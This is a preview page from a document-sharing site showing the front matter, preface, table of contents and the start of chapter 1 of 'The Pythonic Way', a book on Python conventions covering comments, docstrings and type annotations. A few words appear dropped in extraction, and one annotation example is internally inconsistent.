The Pythonic Way: An Architect’s Guide to Conventions and Best Practices for the Design, Development, Testing, and Management of Enterprise Python Code (English Edition) 9391030122, 9789391030124

Learn to build and manage better software with clean, intuitive, scalable, maintainable, and high-performance Python cod

457 104 6MB

English Pages 512 [1073] Year 2021

Report DMCA / Copyright

DOWNLOAD PDF FILE

Table of contents :
Start
Recommend Papers

The Pythonic Way: An Architect’s Guide to Conventions and Best Practices for the Design, Development, Testing, and Management of Enterprise Python Code (English Edition)
 9391030122, 9789391030124

  • 0 0 0
  • Like this paper and download? You can publish your own PDF file online for free in a few minutes! Sign Up
File loading please wait...
Citation preview

The Pythonic Way

An Architect’s Guide to Conventions and Best Practices for the Design, Development, Testing and Management of Enterprise Python Code

Sonal Raj

www.bpbonline.com

FIRST EDITION 2022 Copyright © BPB Publications, India ISBN: 978-93-91030-12-4

All Rights Reserved. No part of this publication may be reproduced, distributed or transmitted in any form or by any means or stored in a database or retrieval system, without the prior written permission of the publisher with the exception to the program listings which may be entered, stored and executed in a computer system, but they can not be reproduced by the means of publication, photocopy, recording, or by any electronic and mechanical means.

LIMITS OF LIABILITY AND DISCLAIMER OF WARRANTY

The information contained in this book is true to correct and the best of author’s and publisher’s knowledge. The author has made every effort to ensure the accuracy of these publications, but publisher cannot be held responsible for any loss or damage arising from any information in this book.

All trademarks referred to in the book are acknowledged as properties of their respective owners but BPB Publications cannot guarantee the accuracy of this information.

www.bpbonline.com

Dedicated to

My parents, Jugal and Sanjukta, All thanks to you. And to my lovely wife, Srishti, You are the light of my life.

About the Author

Sonal Raj is an Engineer, Mathematician, Data Scientist, and Python evangelist from India, who has carved a niche in the Financial Services domain. He is a Goldman Sachs and D.E.Shaw alumnus who currently heads the data analytics and research efforts for a high frequency trading firm.

Sonal holds dual masters in Computer Science and Business Management and is a former research fellow of the Indian Institute of Science. His areas of research range from image processing, real-time graph computations to electronic trading algorithms. He is a doctoral candidate in data science at the Swiss School of Business Management, Geneva. Over the years, he has implemented low latency platforms, trading strategies, and market signal models. With more than a decade of hands-on experience, he is a community speaker and also a Python and data science mentor to the newcomers in the field.

When not engrossed in reading fiction or playing symphonies on the piano, he spends far too much time watching rockets lift off.

Loving son, husband, and a custodian of his personal library.

About the Reviewer

Shubham Sharma is serving as a Senior Remote Sensing Scientist at GeoSpoc, Bengaluru, India. For the past five years, he has been working on Utilization of Python for Satellite Image Processing Applications and worked on the related projects with the Indian Space Research Organization (ISRO). He has been a presenter at leading Python conferences such as PyCon India and has mentored at conferences such as SciPy. In addition, he conducts workshops related to Python programming for Satellite Image Processing. He enjoys Python programming and takes a great interest in outreach of Python programming amongst the community and exploring the scientific frontiers through Python.

Acknowledgements

There are a few people I want to thank, without whose ideas and motivations, writing this book would not have been possible. I thank my adorable wife, Srishti; her support, tolerance, and dedication has kept me going.

Thanks to my parents for always being the pillars of support, and for instilling in me, the insatiable thirst for learning. A warm thanks to my brother, Saswat and all my cousins for the inspiration, love, and humor that they bring into my life. Thanks to my friends, who have helped me in all my endeavours. This book would have been impossible without all of you.

I am eternally grateful to my colleagues and associates in the Python, Fintech, and data science communities, who constantly challenge the status quo, and make Python the powerful tool it is today. Special thanks to Travis Oliphant, the founder of NumFOCUS and Anaconda, whose work and words have helped me develop a social aspect to learning, in the few times we have interacted.

I am also grateful to the reviewer of this book, Shubham Sharma, who has provided me with valuable advice to make this book better.

Special thanks to the BPB Publications team, especially Nrip Jain, Sourabh Dwivedi, Anugraha Parthipan, Surbhi Saxena and Shali Deeraj their support, advice, and assistance in creating and publishing this book.

Preface

What makes Python a great language? The idea is that it gets the ‘need to know balance’ right. When I use the term “need to know”, I think of how the military uses the term. The intent is to achieve focus. In a military establishment, every individual needs to make frequent life-or-death choices. The more time you spend making these choices, the more likely you are choosing death. Having to consider the full range of ethical factors into every decision is very inefficient. Since no army wants to lose their own men, they delegate decision-making up through a series of ranks. By the time the individuals are in the field, the most critical decisions are already made, and the soldier has very less room to make their own decisions. They can focus on exactly what they “need to know”, trusting that their superiors have taken into account everything else that they don’t need to know.

Software Libraries and abstractions are fundamentally the same. Another developer has taken the broader context into account, and has provided you – the end-developer – with only what you need to know. You get to focus on your work, trusting that the rest has been taken care of effectively. Memory Management is probably the simplest example. Languages that decide how the memory management is going to work (such as through a garbage collector) have taken that decision for you. You don’t need to know. You get to use the time you would have been thinking about deallocation, to focus on the actual tasks.

Does to ever fail? Of course, it does. Sometimes you need more context in order to make a good decision. In a military organization, there are conventions for requesting more information, ways to get promoted into positions with more context for complex decisions, and systems for refusing to follow orders or protest. In software, to breaks down when you need some functionality that isn’t explicitly exposed or documented, when you need to debug the library or the runtime code, or just deal with something that is not behaving as it claims it should. When these situations arise, not being able to incrementally increase what you know, becomes a serious blocker. A good balance of “need to know” will actively help you focus on getting your job done, while also providing the escape hatches necessary to handle the times you need to know more. Python gets this balance right. A seemingly complex technical concept in Python is tuple unpacking, but all that the user needs to know here is that they’re getting multiple return values. The fact that there’s really only a single return value and that the unpacking is performed by the assignment and isn’t a necessary or useful knowledge. Python very effectively hides unnecessary details from the users. But when “need to know” starts breaking down, Python has some of the best escape hatches in the entire software industry.

To begin with, there are truly no private members. All the code you use in your Python program belongs to you. You can read everything, mutate everything, wrap everything, proxy everything,

and nobody can stop you; because it’s your program. Duck Typing makes a heroic appearance here, enabling new ways to overcome the limiting abstractions that would be fundamentally impossible in the other languages.

Should you make a habit of doing this? Of course not! You’re using the libraries for a reason – to help you focus on your own code by delegating the “need to know” decisions to someone else. If you are going to regularly question and ignore their decisions, you ruin any advantage you may have received. However, Python allows you to rely on someone else’s code without becoming a hostage to their choices. Today, the Python ecosystem is almost entirely publicly visible code. You don’t need to know how it works, but you have the option to find out. And you can find out by following the same patterns that you’re familiar with, rather than having to learn completely new skills. Reading the Python code, or interactively inspecting the live object graphs, are exactly what you were doing with your own code.

Compare Python to the languages that tend towards sharing compiled, minified, packaged, or obfuscated code, and you’ll have a very different experience figuring out how things really (don’t) work. Compare Python to the languages that emphasize privacy, information hiding, encapsulation, and nominal typing, and you’ll have a very different experience, overcoming a broken or limiting abstraction.

People often cite Python’s ecosystem as the main reason for its popularity. Others claim the language’s simplicity or expressiveness as the primary reason. I would argue that the Python language has an incredibly well-balanced sense of what the developers need to know; better than any other language I’ve used.

Most developers get to write incredibly functional and focused code with just a few syntax constructs. Some developers produce reusable functionality that is accessible through simple syntax. A few developers manage incredible complexity to provide powerful new semantics without leaving the language. By actively helping the library developers write complex code that is not complex to use, Python has been able to build an amazing ecosystem. And that amazing ecosystem is driving the popularity of the language. The book consists of eleven chapters, in which the reader will learn not just how to code in Python, but also how to use the true Python constructs in their code.

Chapter 1 is the introductory chapter, which aims to introduce you to what is widely accepted as the ‘Pythonic’ Conventions which bring out the ease and power of Python, including the conventions for comments, docstrings, naming, code layout, and control structures among others. Chapter 2 will help understand some deeper nuances of the Pythonic data structures, where you will learn how to effectively

use the data structures for the time and space performant applications. Chapter 3 will outline how to make the Python code adhere to the object oriented paradigm, and what some of the unique features are that Python as a language provides to enhance the code reusability, modularity, and data containerization. Chapter 4 aims to introduce you to the concepts for organizing your project’s code better into the encapsulated modules, making better use of imports to improve performance of your code, and avoid introducing bugs and latency with imports.

Chapter 5 will provide insights into how to effectively integrate and implement the Decorators and Context Managers in your code, and help you think through how to create safer Python code in production. Chapter 6 will be touching upon the useful data science tools, and will be diving into some of the best practices that are followed day-to-day by most data scientists to optimize, speed up, automate, and refine their processing tools and applications. Chapter 7 presents some lesser-known perspectives on Iterators, Generators, and Co-routines. Chapter 8 deals with the intricacies of the data and non-data descriptors, and helps understand how to use them for creating your own library or API.

Chapter 9 helps understand and use the design patterns to create scalable architectures and discuss the intricacies of the eventbased, microservice, and API architectures.

Chapter 10 will be taking a deep dive into the test frameworks in Python and the best practices that one should follow in effectively testing the code. Chapter 11 will be discussing how to improve the quality of your work in Python, and help you ship more robust code for the production environment.

Downloading the code bundle and coloured images:

Please follow the link to download the Code Bundle and the Coloured Images of the book:

https://rebrand.ly/2c7e7b

Errata

We take immense pride in our work at BPB Publications and follow best practices to ensure the accuracy of our content to provide with an indulging reading experience to our subscribers. Our readers are our mirrors, and we use their inputs to reflect and improve upon human errors, if any, that may have occurred during the publishing processes involved. To let us maintain the quality and help us reach out to any readers who might be having difficulties due to any unforeseen errors, please write to us at :

[email protected]

Your support, suggestions and feedbacks are highly appreciated by the BPB Publications’ Family.

Did you know that BPB offers eBook versions of every book published, with PDF and ePub files available? You can upgrade to the eBook version at www.bpbonline.com and as a print book customer, you are entitled to a discount on the eBook copy. Get in touch with us at [email protected] for more details.

At you can also read a collection of free technical articles, sign up for a range of free newsletters, and receive exclusive discounts and offers on BPB books and eBooks.

BPB is searching for authors like you

If you're interested in becoming an author for BPB, please visit www.bpbonline.com and apply today. We have worked with thousands of developers and tech professionals, just like you, to help them share their insight with the global tech community. You can make a general application, apply for a specific hot topic that we are recruiting an author for, or submit your own idea.

The code bundle for the book is also hosted on GitHub at In case there's an update to the code, it will be updated on the existing GitHub repository.

We also have other code bundles from our rich catalog of books and videos available at Check them out!

PIRACY

If you come across any illegal copies of our works in any form on the internet, we would be grateful if you would provide us with the location address or website name. Please contact us at [email protected] with a link to the material. If you are interested in becoming an author

If there is a topic that you have expertise in, and you are interested in either writing or contributing to a book, please visit

REVIEWS

Please leave a review. Once you have read and used this book, why not leave a review on the site that you purchased it from? Potential readers can then see and use your unbiased opinion to make purchase decisions, we at BPB can understand what you think about our products, and our authors can see your feedback on their book. Thank you! For more information about BPB, please visit

Table of Contents

1. Introduction to Pythonic Code Structure Objectives The importance of clean Python code Adding comments to your code Block comments Inline comments Writing Docstrings Using annotations Pythonic naming Code layout in Python Blank lines Maximum line length and line breaking Indentation – tabs vs. spaces Indentation following line breaks Positioning the closing braces Handling whitespaces in expressions and statements Control structures in Python Complex list comprehensions Lambda usage Should I use a generator or a list comprehension? Can we use an else with loops? Using enhanced range in Python 3 Clean Python code patterns Liberal use of assertions Where to place the commas? The ‘with’ statement for context managers Dunders, underscores, and other features

A secret about formatting strings The Zen of Python Easter egg Code quality enforcement tools Style guides for Pythonic guides Python code linters Conclusion Key takeaways Further reading

2. Pythonic Data Structures Structure Objectives Lists and array optimizations What is special about using list comprehensions? Using list comprehension instead of map() and filter() Use negative index for fast reverse access Determine iterability with all (and any) Remaining sequence using * operator Get basic typed arrays with array.array Immutable unicode character arrays with str Single byte mutable sequences with bytearray Using bytes as an immutable sequences of single bytes Creating efficient dictionaries Provide default parameters while retrieving dict values Default values using defaultdict for missing keys Simulate switch-case using dicts Dict comprehensions for optimized dict construction Maintaining key order with collections.OrderedDict Using the collections.ChainMap to make multiple dictionaries searchable

Create a read-only dict with types.MappingProxyType Ways to sort dictionaries Ways to merge dictionaries Pretty printing a Python dictionary A weird expression!? Dealing with Python sets Understand and use the mathematical set operations Set generation with comprehensions Using sets to determine common list values Eliminating duplicate elements from Iterables Creating immutable sets with frozenset Using multisets or bags with collections.Counter Tuple tricks Write clearer tuples with namedtuple Unpacking data using tuples Ignore tuple data with the ‘_’ placeholder Return multiple values from functions using tuples Namedtuples with advanced features with typing.NamedTuple Handling strings better Create a single string from list elements with ‘’.join” Enhance clarity by chaining string functions Use the format function for constructing strings Working with ASCII codes using ord and chr Other data structure trivia Creating serialized C structs with struct.Struct Attribute defaults with types.SimpleNamespace Implement speedy and robust stacks with collections.deque Implement fast and robust queues with collections.deque Parallel compute lock semantics with queue.queue Parallel compute lock semantics with queue.LifoQueue Using shared job queues using multiprocessing.Queue

Using list based binary heaps with heapq Implementing priority queues with queue.PriorityQueue Conclusion Key takeaways Further reading 3. Classes and OOP Conventions Structure Objectives Conventions for Python classes Optimal size classes Ideal structure of a class Using the @property decorator When to use static methods? Using classmethod decorator for state access Choosing between public and private Attributes Using is vs == for comparing objects super() powers in Python How to use super() effectively Search order with Method Resolution Order (MRO) Super() business advice Properties and attributes of objects Iterable objects and their creation Sequence creation Container objects Handle object attributes dynamically Callable objects More Pythonic class conventions Use __str__ for readable class representation Make use of __repr__ for representing classes Custom exception classes

Cloning Python objects Abstract base classes with abc module for inheritance Pitfalls of class vs instance variable Using self or classmethod with class’s attributes Classes are not just for encapsulation! Fetching object type using the isinstance function Data classes Creating and operating on data classes Immutable data classes Inheritance How to optimize data classes? Conclusion Key takeaways Further reading 4. Python Modules and Metaprogramming Structure Objectives Modules and packages Using __init__.py files for package interface creation Creating executable packages using __main__.py Encapsulate with modules! Using modules for organised code Type hinting and circular imports Using conditional imports with type hints Singleton nature of imports in Python Lazy imports for Python modules Features of Python module imports Can modules use characters besides English? Do Python modules need the .py extension? Can a module be available across the system?

What happens with modules having the same name? Decide which imports to expose with __all__ Python metaclasses When are metaclasses needed Validating subclasses with the __new__ method What more can you do with __slots__ ? Metaclasses for changing class behaviour Descriptors in Python Conclusion Key takeaways Further reading 5. Pythonic Decorators and Context Managers Structure Objectives Understanding Python Decorators Décoration of functions Decoration of classes Decoration of other constructs Accepting arguments in decorators Evaluation of multiple decorators Using functools library for decorators Stateful decorators Creating singletons with décorators Caching function return values – memoisation Using decorators for tracing code Writing effective decorators Preserving data about the original wrapped object Handling decorator side-effects Advantages of decorators with side-effects Create decorators that work for multiple object types

Validating JSON data Control execution rate of code Décorators and the DRY principle Separation of concerns in decorators An analysis of optimal decorators Context managers Manage resources with context managers Using contextlib for creating context managers Some practical uses of context managers Safe database access Writing tests Resource sharing in Python Remote connection protocol Conclusion Key takeaways Further reading 6. Data Processing Done Right Structure Objectives Evolution of Python for data science Using Pandas dataframes and series DataFrames creation Dataframe index with row and column index Viewing data from the Pandas Dataframe

Helper functions for Dataframe columns Using column as row index in DF Selective columns load in Pandas Dataframe Dropping rows and columns from DataFrames Mathematical operations in DataFrames Creating Pandas series

Slicing a series from a DataFrame in Pandas Series from DataFrame iterations Using series to create DataFrames Using Dicts to create DataFrames Creating DF from multiple dictsHelper Functions for Pandas Series Series iterations Pandas tips, tricks and idioms Configurations, options, and settings at startup Using Pandas’ testing module for sample data structures Using Accessor methods DatetimeIndex from component columns Using categorical data for time and space optimization Groupby objects through iteration Membership binning mapping trick Boolean operator usage in Pandas Directly load clipboard data with Pandas Store Pandas objects in a compressed format Speeding up your Pandas projects Optimize Dataframe optimizations with indexing Vectorize your Dataframe operations Optimize Dataframe multiplication Using sum() of Numpy instead of sum() of Pandas

Using percentile of Numpy, rather than quantile of Pandas for smaller arrays How to save time with Datetime data? Using .itertuples() and .iterrows() for loops Making use of Pandas’ .apply() Using .isin() to select data Improving the speed further? Sprinkle some Numpy magic Using HDFStore to avoid reprocessing

Python and CSV data processing Data cleaning with Pandas and Numpy Dropping unnecessary columns in a DataFrame Changing the index of a DataFrame Clean columns with .str() methods Element-wise dataset cleanup using the DataFrame.applymap() Skipping rows and renaming columns for CSV file data Generating random data Pseudorandom generators PRNGs for arrays – using random and Numpy urandom() in Python – CSPRNG Python 3+ secrets module Universally unique identifiers with uuid() Bonus pointers Conclusion Key takeaways Further readings

7. Iterators, Generators, and Coroutines Structure Objectives Iterators Generators are examples of Python iterators Fundamentals of iterables and sequences for loops – under the hood Iterators are iterables Python 2.x compatibility Iterator chains Creating your own iterator Improve code with lazy iterables Lazy summation

Lazy breaking out of loops Creating your own iteration helpers Differences between lazy iterable and iterables Anything that can be looped over is an iterable in Python The range object in Python 3 is not an iterator The itertools library Other common itertools features Generators Generators are simplified iterators Repeated iterations Nested loops Using generators for lazily loading infinite sequences Prefer generator expressions to list comprehensions for simple iterations Coroutines Generator interface methods The close() method The throw() method The send(value) method Can coroutines return values? Where do we use yield from? Another case of capturing returned value of generators Another case of sending and receiving values from generators Asynchronous programming Looping Gotchas Exhausting an iterator Partially consuming an iterator Unpacking is also an iteration Conclusion Key takeaways Further reading

8. Python Descriptors Structure Objectives Python descriptors Descriptor types Non-data descriptors Data descriptors The lookup chain and attribute access Descriptor objects and Python internals Property objects are data descriptors Creating a cached property with descriptors Python descriptors in methods and functions Writable data attributes How Python uses descriptors internally Functions and methods Built-in decorators for methods Slots Implementing descriptors in decorators

Best practices while using Python descriptors Descriptors are instantiated only once per class Put descriptors at the class level Accessing descriptor methods Why use Python descriptors? Lazy properties of descriptors Code in accordance to the D.R.Y. principle Conclusion Key takeaways Further reading 9. Pythonic Design and Architecture Structure

Objectives Python specific design patterns The global object pattern The prebound method pattern The sentinel object pattern Sentinel value Null pointers The null object pattern Sentinel object patterns in Python The influence of patterns over design Python application architecture Utility scripts Deployable packages and libraries Web application – Flask Web application – Django Event driven programming architecture Contrast with concurrent programming

Exploring concurrency with event loops Microservices architecture Frameworks supporting microservices in Python Why choose microservices? Pipe and filter architecture API design pointers Scaling Python applications Asynchronous programming in Python Multiprocessing Multithreading Coroutines using yield The asyncio module in Python Distributed processing using Redis Queue (RQ) Scaling Python web applications – message and task queues

Celery – a distributed task queue A celery example Running scheduled tasks with Celery Ability to postpone task execution Set up multiple Celery queues Long running tasks with Celery Application security Security architecture Common vulnerabilities Assert statements in production code Timing attacks XML parsing A polluted site-packages or import path Pickle mess-ups Using yaml.load safely

Handle requests safely Using bandit for vulnerability assessment Other Python tools for vulnerability assessment Python coding security strategies Conclusion Key takeaways Further reading 10. Effective Testing for Python Code Structure Objectives How unit tests compare with integration tests Choosing a Test Runner unittest Nose2 pytest

Structuring a simple test The SetUp and TearDown methods Writing assertions Do not forget to test side effects Web framework tests for Django and Flask applications Using the Django Test Runner Using Flask with Unittest Some advanced testing Gotchas How do we handle expected failures? How to compartmentalize behaviors in the application? How do we write integration tests? How do we test data-driven applications? Multi-environment multi-version testing Configure tox for your dependencies Executing tox Automate your test execution Working with mock objects How do we use mock objects? Types of mock objects in Python Advanced use of the Mock API Assertions on Mock objects Cautions about usage of mocks and patching Miscellaneous testing trivia flake8 based passive linting More aggressive linting with code formatters Benchmark and performance testing the code Assessing security flaws in your application Best practices and guidelines for writing effective tests Prefer using automated testing tools Using doctest for single line tests Segregate your test code from your application code

Choose the right asserts in your tests Conclusion Key takeaways Further reading 11. Production Code Management Structure Objectives Packaging Python code Structure of a Python package Configuring a package Specifying dependencies Adding additional non-Python files to the package Building the package Distributing a packaged library Configure and upload package to PyPI Register and upload to testpypi (optional) Testing your package Register and upload to PyPI Readme and licencing Creating executable packages How to Ship Python Code? Using git and pip for application deployment Using Dockers for deployment Using Twitter’s PEX for deployment Using platform specific packages – dh-virtualenv Making packaging easier – make-deb Should you use virtual environments in production? Garbage collection Viewing the refcount of an object Does Python reuse primitive type objects?

What happens with the del command? How reference counting happens in Python? Using garbage collector for reference cycles Can we deallocate objects by force? Customizing and managing garbage collection Security and cryptography Create secure password hashes Calculating a message digest What hashing algorithms are available? How do we hash files? Using pycrypto to generate RSA signatures Using pycrypto for asymmetric RSA encryption Using pycrypto for symmetric encryption How do we profile Python code? Using the %%timeit and %timeit for time profiling Profiling with cProfile Profiling using the timeit() function Using the @profile directive for line profiling code Setting up a pre-commit hook for tests and validations Working around the Global Interpreter Lock (GIL) Multiprocessing pool Using nogil for multithreading in Cython Conclusion Key takeaways Further reading Index

CHAPTER 1 Introduction to Pythonic Code

“Do the right thing. It will gratify some people and astonish the rest.”

— Mark Twain

As is the case with most programming languages, there exists a set of community-accepted guidelines and conventions, which help in the promotion of applications that are maintainable, crisp, uniform, and concise, and basically written in the way the language had intended them to be written. The guidelines provide suggestions on how to create proper conventional names for classes, functions, variables, and modules, to constructing loops, and how to correctly wrap your lines in the Python scripts. The term “Pythonic” is generally used in the context of programs, methods, and code blocks, which adhere to these guidelines to make the best of Python’s powerful features.

Structure

This chapter will broadly cover the following topics: Importance of clean Python code

Writing better comments, docstrings, and annotations.

Naming and code layout in Python Control structures in Python

Clean Python code patterns

Code quality enforcement tools

Further, we aim to introduce you to what is widely accepted as ‘Pythonic’ conventions, which bring out the ease and power of the Python language.

Objectives

You will understand that just like there is a difference in knowing how to drive and knowing how to drive a Ferrari – similarly knowing how to best use Python is different from simply knowing how to code. The main objectives of this chapter include the following:

Understanding the common practices of writing scalable and legible code. Using constructs like docstrings, comments, and basic tools for maintainable production codebases.

Understanding some of the lesser-known features about structuring Python code.

The importance of clean Python code

When working with Python in production, a cleanly written codebase is important from the view of creating a maintainable and successfully managed project, thereby leading to a reduction in the technical debt and creating effective agile development.

For a continuous, successful delivery of features, with a steady, constant, and predictable pace of work, it is paramount that the code base is readable, clean, and maintainable. Otherwise, every time you start working or estimating the work on a new project, which is a little out of the way, there will be tons of refactoring involved, thereby leading to technical debt.

All the compromises and bad decisions accumulate problems in the software. This is referred to as Technical One instance of technical debt would be currently faced problems that result from the decisions from the past or historical bad code. On the other hand, taking shortcuts in the current code, without giving proper time to design or review, can lead up to issues in the future. It is aptly called debt, since it will be more complicated and expensive to handle in the future than now, and even more with passing time. Every time work is delayed because your team gets blocked on a bug fix or code restructuring is how you can quantify the cost of technical debt. Technical debt is slow and progressive, and hence not easily identified or explicitly alarming. Hence, the underlying problem remains hidden.

PEP 8 is the standard set of conventions, which we follow in Python (more discussions on that, later in the chapter). It can be followed as is, or extended to suit your use case or project. These conventions already incorporate several Python syntax particulars (which you may not have encountered in other languages), and was created by the developers of the language itself. The improvements that come with following these conventions include the following:

Consistent With time, you get used to reading through code of a certain format. Having uniform formats of code within an organisation is of utmost importance for scalability in the long term, and making the onboarding of new developers relatively easy. Learning and maintenance becomes simpler when the code layout, naming convention, and documentation, among other features, is identical across all the repositories maintained across the firm.

Greppable Imagine a scenario where you are trying to grep a variable. Now the variable can occur in assignment statements, or as named arguments in function arguments. If we want to differentiate between the two in order to refine our search, what options do we have?

The PEP 8 conventions say that named argument assignments should not have spaces around the operator, whereas block assignments are preferred to have spaces around the operator. So, when searching for arguments, you can use the following:

$ grep -nr "name=" . ./validate.py:23: name=user_name, When searching for variable assignments, you can use the following: $ grep -nr "name =" . ./validate.py:20: user_name = get_username()

This makes the search efficient. Following the conventions can make a difference and lead to higher code quality. Getting used to a structured code base gradually reduces the time taken to understand such code. Over time, you will be able to identify bugs at a glimpse and reduce the number of mistakes. It is simple muscle memory. Additionally, code quality is ensured with advanced static code analysis and repair tools, which are to be discussed later.

Uniform coding standards help an organization scale its code base, even though they may not conform to the globally accepted standards. If your organization does not have a set of well-defined conventions, it is still not late to create one.

Adding comments to your code

A clean and well-documented code base goes a long way in ensuring production reliability for any company. You reduce bugs and errors, and ensure that handing over ownership of the code base to future generations is a seamless process, and you do not have to rewrite your software every time someone leaves.

Comments should be added, preferably at the time of the initial development. Personally, I prefer to have people start their code structure with elaborate comments and then fill in the gaps with functional code. Not only does that reduce the future burden of adding documentation, it also helps in ensuring a well thought out first draft of the software.

Some key points to keep in mind in the process of adding comments are as follows:

A maximum of 72 – 80 characters should be the limit of the comment line.

Complete sentences in camel-case is preferred. Developers and Reviewers should ensure that comments are updated when code is changed to avoid future confusion.

Let us take a glimpse of the types of comments that are popular in Python and their nuances.

Block comments

The aggregated comments for a sub-section of the code can be documented using block They can be a single line or multi-line in nature, and are useful when you have to explain specifics of a functionality or the use of a section of code – for example, the headers of a file that is being parsed or updating the schema of a DB, etc. They provide readers a perspective of why a fragment of code exists in the way it does. The standard PEP8 conventions outline the following guidelines for block comment construction:

The spacing/level of the comment should match the indent level of the code that they are talking about.

Every comment line should begin with a hash (#), followed by a space, before the text starts.

Multiple paragraphs should be separated with a blank comment line, starting with a #, rather than just a blank line.

A very simple and naive example of a block comment explaining a loop functionality is noted as follows:

for counter in range(0, 100):

# Iterate 100 times and output the value to # console followed by a new line character print(counter, '\n')

For a complex code that needs more explanation, multi-paragraph block comments are needed, which is shown as follows:

def equation_quad(a, b, c, x): # Compute the result of a quadratic equation # using the general quadratic formula.

# Quadratic Equations result in 2 solutions, @ # res_1 and res_2. res_1 = (-b+(b**2 - 4*a*c)**(1/2))/(2*a) res_2 = (-b-(b**2 - 4*a*c)**(1/2))/(2*a) return res_1, res_2 When in doubt about which comment type to use, choose block. Use it generously for all non-trivial code in the application, and do not forget to update them when working on the code.

Inline comments

Inline comments may syntactically look like the block comments in Python; however, their purpose is different. They are used to convey information about a single line of code, usually as a note, reminder, warning, or a heads-up regarding whatever is being done in that line of code. It ensures that developers working on that line in the future are not confused with any hidden logic, rationales, or agenda. Let us look at what PEP8 conventions have to say about the inline comments:

Use inline comments only if necessary, else avoid.

They should be at the end of the same line as the code they refer to.

There should be a minimum of two or more spaces between the code and the comments for readability.

Similar to block comments, start inline comments with a # and a single space thereafter. Avoid over explanation of obvious logic with inline comments.

A Pythonic inline comment in action looks like the following:

variable = 50 # This is a random number variable

When we say avoid explaining the obvious, we also include situations where better variable names can do the job for you:

x = 'Nicola Tesla' # Name of Student

Do not waste an inline comment on this. Rather, christen it with a better name: name_of_student = 'Nicola Tesla'

Then, there are the obvious comments, which many developers have a habit of using, like the following:

list_variable = [] # Initialize an empty list var_name = 50 # Initialize the variable var_name = var_name * 20 # Multiply variable by 20 We know it, John! If you have entrusted us to review your code, hopefully, we can understand the syntax without inline comments!

Inline comments have very specific use cases, and frequent misuse of inline comments can lead to an absolutely confusing and cluttered code base. My advice is to stick to block comments,

with which you will increase the chances of keeping your code PEP8 compliant.

Writing Docstrings

The Documentation Strings or in short, docstrings are a Python format for strings that are wrapped with a triad of single (‘‘‘) or double (“““) quotes, which are written on the starting line of a Python class, module, method, or function. Their purpose is to explain the use or operations of a specific construct. The PEP 257 is completely dedicated to explaining the docstring’s protocols and usages. In this section, we will be looking at the key pointers to keep in mind while using docstrings. Docstrings are simply string literals. You can place them anywhere in your code for logic or functionality documentation. However, docstrings are not comments. So, what is the difference here?

I still find engineers using docstrings to add comments in the code, just because it makes multi-line comments easier. Do not give in to that temptation. Your actions could lead to some random comment getting parsed by an automated software documentation tool and confusing others.

The subtle difference is that documentation is used for explanation, rather than justification. Docstrings do not represent comments, rather they represent the documentation of a particular

component. Using docstring is not just widely accepted, it is also encouraged for good quality code.

Conventionally, too many comments are frowned upon for several reasons. Firstly, if you need an extensive comment to explain why and how something is being done, then your code is possibly sub-standard. Code should be self-explanatory. Secondly, comments can be misleading sometimes. Having an incorrect explanation in comments can be more disastrous than having no comments at all. Therefore, if someone forgets to update the comments in the code when they update the code, then they’ve just created a landmine. Sometimes, we cannot avoid using comments. Maybe there is an error in a third-party library that has to be circumvented. In those cases, placing a small but descriptive comment might be acceptable. With docstrings, however, the story is different as we’ve discussed earlier. Hence, it is a good practice to add higher-level docstrings for a component overview. The dynamic typing feature in Python makes the use of docstrings important. Say, you write a function which takes a generic input or any value type for its argument – the interpreter will not enforce a type here. Maintaining such a function would be especially difficult if you do not know how the types need to be handled, or how they are supposed to be used.

This is where docstrings shine. Documenting the expected input parameters and types, and return types is a common practice to

write robust Python code, which helps in understanding the working of the application better. Let us take an example of a docstring from the standard Python library: In [1]: dict.update?

Docstring: D.update([E,]**F) -> None. Update D from dict/iterable E and F. If E is present and has a .keys() method, then does: for k in E: D[k] = E[k] If E is present and lacks a .keys() method, then does: for k, v in E: D[k] = v In either case, this is followed by: for k in F: D[k] = F[k] Type: method_descriptor This documentation on updating dictionaries, provides helpful information, and expresses that the update method can be used in different ways:

The original dictionary contents can be updated with the keys from an object that is passed to the method (which can be another data structure having a keys() method; e.g. another dictionary). >>> d = {} >>> d.update({3: "three", 2: "two"}) >>> d

{3: 'three', 2: 'two'} An iterable can be passed, having pairs of keys and values, which will be used to update the original dictionary contents. >>> d.update([(1, "one"), (4, "four")]) >>> d {1: 'one', 2: 'two', 3: 'three', 4: 'four'} In situations like these, docstrings are useful for learning and understanding how the function works.

In the preceding example, we obtained the docstring of the function by using the question mark on it (dict.update?). This is a feature of the iPython (or currently Jupyter) interactive interpreter. A double question mark (??) can also be used, and in some cases you can retrieve more information.

Another difference to note between comments and docstrings is that comments are ignored during execution, whereas the interpreter processes docstrings. Docstrings are part of the application code, and Python exposes it with the help of the __doc__ attribute on the object. >>> def delta_method(): …     """A random generic documentation"""

…     return None … >>> delta_method.__doc__ 'A random generic documentation'

Once this is programmatically exposed, it is possible to access the docstrings during the runtime and enable the generation of consolidated documentation from the source code base. There are several tools that can use this feature to generate beautiful documentations for you. Sphinx is one such popular documentation generator. It uses an autodoc extension to parse the docstrings from your code and convert them into documentation pages in html. This can then be packaged or published for the users of the program to create a user manual without any additional effort. For publicly available projects, this can be automated using ReadTheDocs which will trigger builds of the documentation from a repository or a branch. On-premise configuration of the tool should be used for sensitive projects in the organisation to be access-controlled. However, it has to be ensured that they are updated with every associated code change.

Maintaining a detailed and updated documentation is a challenge in software engineering. If you intend your project to be understood and read by other humans, you should have to put in the manual effort to document your code. The key is to understand that software is not just about code. The documentation that comes with it is also part of the deliverable. Therefore, when someone is updating a function, it is equally critical to update the corresponding part of the documentation to

the code that was just changed, regardless of whether it is a wiki, a user manual, a README file, or several docstrings.

Note that comments are ignored during execution, whereas the interpreter processes docstrings.

Using annotations

Annotations were introduced in Python with PEP 3107. They introduce the functionality of providing hints to the application users as what should be expected as arguments and their associated datatypes. Annotations enable the feature of Type Hinting in Python. They allow specifying not only the types of the expected variables, but also any metadata that can assist in getting a better idea about what the data is representing. Let us take an example to illustrate this:

class Rectangle: def __init__(self, length, width): self.length = length self.width = width self.area = 0

def area(length: float, width: float) -> Rectangle: """Compute area of a Rectangle given its sides""" … In the preceding example, the length and width are accepted as float values. However, this is simply a suggestion to the user of this code about expectations, but Python will not be enforcing or

checking these data types. You can also specify the return type of the method.

Interestingly, built-ins and types are only some of the information that can be used with annotations. All Python interpreter entities can be placed in the annotations for use. For example, you can use a string explaining the variables’ or functions’ intentions.

When annotations were introduced, a special attribute was added to the language called which provided an API to access the namevalue pairs of the defined annotations in the form of a dictionary. For the preceding example, it would look like the following:

>>> area.__annotations__ {'length': float, 'breadth': float, 'return': __main__.Rectangle}

